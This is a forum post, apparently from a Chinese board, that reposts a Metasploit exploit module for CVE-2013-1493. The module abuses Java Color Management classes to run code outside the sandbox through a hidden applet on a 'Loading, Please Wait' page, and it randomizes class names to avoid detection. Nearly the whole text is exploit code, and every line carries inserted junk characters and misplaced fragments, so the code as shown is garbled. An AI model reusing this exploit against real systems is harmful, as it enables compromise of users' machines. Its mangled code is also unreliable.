##8 F8 M' v9 G% `# [
% o2 G) s- X, W% h! F# This file is part of the Metasploit Framework and may be subject to
2 e e) y. E! i8 N+ R: x/ @# redistribution and commercial restrictions. Please see the Metasploit
6 h3 X2 _0 P5 ^% O! F4 V# web site for more information on licensing and terms of use.
; `+ X+ E! p- S/ B7 w' ^/ F# http://metasploit.com/
9 S0 l. ~0 \; i0 V: V7 O##
4 d- o1 s- r2 Urequire ‘msf/core’! ?- s! _, d- ]9 D
require ‘rex’( H% c9 i# h6 z E0 V# V1 L: N
class Metasploit3 < Msf::Exploit::Remote( \$ a# F2 V8 y) o1 u
Rank = NormalRanking, q! V4 r5 `0 ]8 n
include Msf::Exploit::Remote::HttpServer::HTML
5 V/ ?- R* T: X5 `" h0 v8 Ninclude Msf::Exploit::EXE
3 D, Y2 _; j# m" i, B0 tinclude Msf::Exploit::Remote::BrowserAutopwn1 i# ^, g( [, t& U* I
autopwn_info({ :javascript => false })
1 \! n" q5 m: Y0 S& o# F% wdef initialize( info = {} )
6 ], R! d& C0 b6 O7 P& osuper( update_info( info,
9 K( \. e c2 L‘Name’ => ‘Java CMM Remote Code Execution’,
- c7 g" O9 f& l5 T F- q‘Description’ => %q{# m: q0 _& c9 C8 x' o9 M7 t/ |. K! K
This module abuses the Color Management classes from a Java Applet to run
* [& y( D- j" S2 c( L) _4 earbitrary Java code outside of the sandbox as exploited in the wild in February
, x; ~9 Y: u' C: `; s+ V5 G# vand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41+ P6 q% Q. K8 M$ ?7 a' C
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
, G$ @* u8 t- Ssystems. This exploit doesn’t bypass click-to-play, so the user must accept the java9 J3 s Z: E( ^6 _; E
warning in order to run the malicious applet.
1 @: C% |, d- Y S* ^% r" b" N( C},
0 v" M% @7 p! v- d+ @‘License’ => MSF_LICENSE, f: d; f$ F4 @1 E8 R& ?
‘Author’ =>3 ^0 V, C# Y; |0 j' U# o& g8 r
'Unknown', # Vulnerability discovery and Exploit/ c# w/ Y t7 k
'juan vazquez' # Metasploit module (just ported the published exploit)4 k0 J# `; G1 s
],
6 g$ u9 p! ^" A" Z. b- G3 _7 I, y‘References’ =>
5 y0 x1 `, L3 \; }& Q1 x! L& e$ t0 c[
4 ?% t: Y4 `% a4 D[ 'CVE', '2013-1493' ],
2 x8 G3 {! p; K& e. {[ 'OSVDB', '90737' ],1 ~: W3 A1 \ H
[ 'BID', '58238' ],
) I3 `& p) F. L+ ~2 H( A2 a[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],* @% b1 ^3 o* ]3 m3 J7 T+ z
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
( T. o8 {# j- _3 t x[ 'URL', 'http://pastie.org/pastes/6581034' ]
1 a8 M$ H) v- a% A; u+ |* {; H],; P ]1 ^3 v( T3 f% T6 Z4 f
‘Platform’ => [ 'win', 'java' ],- H/ V t t2 B" w9 } j5 u
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },# N5 j5 @7 f7 y0 L6 J# R
‘Targets’ =>5 K3 G s$ }+ @# n6 m q. D
[
- T. o* ?6 J% {$ q[ 'Generic (Java Payload)',! R) I' n% ~4 K" g' R$ V
{) I. ^* H6 W. o+ H
'Platform' => 'java',' P) d7 T9 z" Y2 O' f
'Arch' => ARCH_JAVA
6 A3 j# }- x% W9 r}3 V3 ?8 r9 P. O* _1 V6 @
],
/ b( c* K9 `* b6 q' q$ a3 |[ 'Windows x86 (Native Payload)',2 y1 N6 h# e' M& ]9 d6 |3 v$ E
{
0 a& Q: Q1 `( T5 U'Platform' => 'win',# }7 g' x. s, B
'Arch' => ARCH_X867 D8 J3 B# [2 {
}/ h" o) h( h# k) g2 w2 P
]
$ R# s2 O0 R& {& K* [1 b],
: B! S5 k+ s1 Z1 Y‘‘DisclosureDate’ => ‘Mar 01 2013′4 i. N7 n( h' ]! _5 W
))
4 N1 w4 t( T- p, P: ?end& C5 M. }" U1 s0 z; c5 e0 ~% f
def setup& d3 b. f4 R0 j7 N' d6 L9 Q
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”): } E% D9 Z; M
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
' L3 I- A/ Q" L+ [* D jpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)' I( Z1 `7 b, l! k" x
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
1 y3 r% o7 d# ~9 F2 Jpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)$ D7 W1 g: h/ s0 @, A! q) n
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
9 A5 p R2 }/ `& x2 {6 \) rpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)/ b& z. _+ u5 h
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
! v" J5 J2 n) M G3 I/ j; j@init_class_name = rand_text_alpha(“Init”.length)
* _. [0 @$ V6 W@init_class.gsub!(“Init”, @init_class_name)
# g% }8 v: [7 k# C" ]/ h! Y2 Isuper
+ p( \4 e3 r; s% b3 m3 gend, B6 D+ q6 r2 a" R6 ?# q
def on_request_uri(cli, request)& v! m) [6 ?9 x3 z/ @- V
print_status(“handling request for #{request.uri}”)
1 p! I! Y, j$ S7 H; b: u( W. xcase request.uri1 X3 L4 \5 }0 B- Q/ g
when /\.jar$/i5 Y1 v, B! G' R, m
jar = payload.encoded_jar" k: d. @' n6 Y) w+ b2 ^
jar.add_file(“#{@init_class_name}.class”, @init_class)5 f y# u6 v8 O7 y
jar.add_file(“Leak.class”, @leak_class)8 e& k! F2 I& L h/ b
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)) b/ N+ ]$ d1 e0 M" N" d
jar.add_file(“MyColorSpace.class”, @color_space_class)9 O0 _# `+ w: K4 ~ F( `2 I
DefaultTarget’ => 1,% K* f; F, ]% ^% u; Z& x: }, k
metasploit_str = rand_text_alpha(“metasploit”.length). v7 u5 _. H. s2 u$ X. G8 _6 g, c
payload_str = rand_text_alpha(“payload”.length)
) F+ `& p6 r' W( Y, Ljar.entries.each { |entry|
) p& z7 f* H* q6 {3 @8 q2 ?8 t7 Fentry.name.gsub!(“metasploit”, metasploit_str)& T5 N0 T2 \. K) w% Y9 g9 Q
entry.name.gsub!(“Payload”, payload_str)
# H6 Z" X3 }9 b" D* T7 s. @entry.data = entry.data.gsub(“metasploit”, metasploit_str)$ N' E K9 C0 H+ x/ |
entry.data = entry.data.gsub(“Payload”, payload_str)4 h4 C2 c2 Q; f& V* }. E4 y
}
6 D, p M; z7 ]0 Wjar.build_manifest) {+ R+ |7 g6 i
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
! T9 Y' u+ d7 B# G+ bwhen /\/$/ c9 C! ^ u3 H' _1 n; L
payload = regenerate_payload(cli)
w7 R2 ?0 P! Q% G* Z/ H* j& [7 Oif not payload; r1 q" \ L7 x9 U! d$ R5 t
print_error(“Failed to generate the payload.”)
3 g, ~' n* M- l% m( H1 zsend_not_found(cli). o2 s) {; t1 n- m3 x% |% L
return; z9 G7 c2 A; d1 i+ W# E# X! \
end0 S1 z5 o3 z% O; [0 ]3 _( A! Q$ f3 `
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ }) }4 @5 o# [" h$ V+ [/ M
else, U6 r1 v7 o2 {# ~: |
send_redirect(cli, get_resource() + ‘/’, ”)
7 @0 f3 D- J: H- jend
- X' V K9 I1 {& x; E% xend
! n6 {; L1 [. X: i. q) pdef generate_html
/ L9 T( F, @# E( n( i0 Khtml = %Q|<html><head><title>Loading, Please Wait…</title></head>|
, Q* Q9 |" K8 Xhtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|: m) P9 h, t3 e; i5 P/ p9 }
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|8 S8 f9 U7 u# i# L
html += %Q|</applet></body></html>|
% o1 I: T8 r- a! S+ t# r4 sreturn html) Y0 _5 H5 j9 G
end
& `1 m" x$ Z. r2 b6 m" v0 k' zend
o* J: w& |* e& u' Tend, A1 E% g6 o* F! l) d% F+ V5 v
|
发表于 2013-4-4 17:31:17
收藏
支持
反对